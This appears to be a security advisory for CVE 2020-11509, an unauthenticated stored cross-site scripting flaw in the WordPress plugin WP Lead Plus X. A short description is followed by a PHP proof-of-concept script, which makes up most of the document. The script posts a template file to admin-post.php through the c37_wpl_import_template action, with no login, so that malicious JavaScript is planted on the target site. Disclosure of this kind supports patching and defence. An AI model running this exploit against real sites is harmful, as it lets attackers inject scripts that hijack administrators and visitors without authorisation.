WP Lead Plus X < 0.99 – Unauthenticated Stored Cross-Site Scripting (XSS) | CVE 2020-11509

Description

One of the features available to users who have paid for a license key for WP Lead Plus X is the ability to create and use "template" pages, which can be imported as a starting point when creating new pages. Although this feature is not visible if the plugin does not have a license key, it was still possible for an unauthenticated user to import a template containing malicious JavaScript. This was due to an admin_post action available to unprivileged visitors, c37_wpl_import_template

Proof of Concept

<?php
// Settings
$url = $argv[1]; //URL of the site
$urlbits = parse_url($url);
$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

//Import a malicious page template
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-post.php');
$cFile=curl_file_create(realpath('pocpage.tpl'));
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
	'action' => 'c37_wpl_import_template',
	'files_name[]' => $cFile,
]);
$output = curl_exec($ch);
echo $output;
curl_close($ch);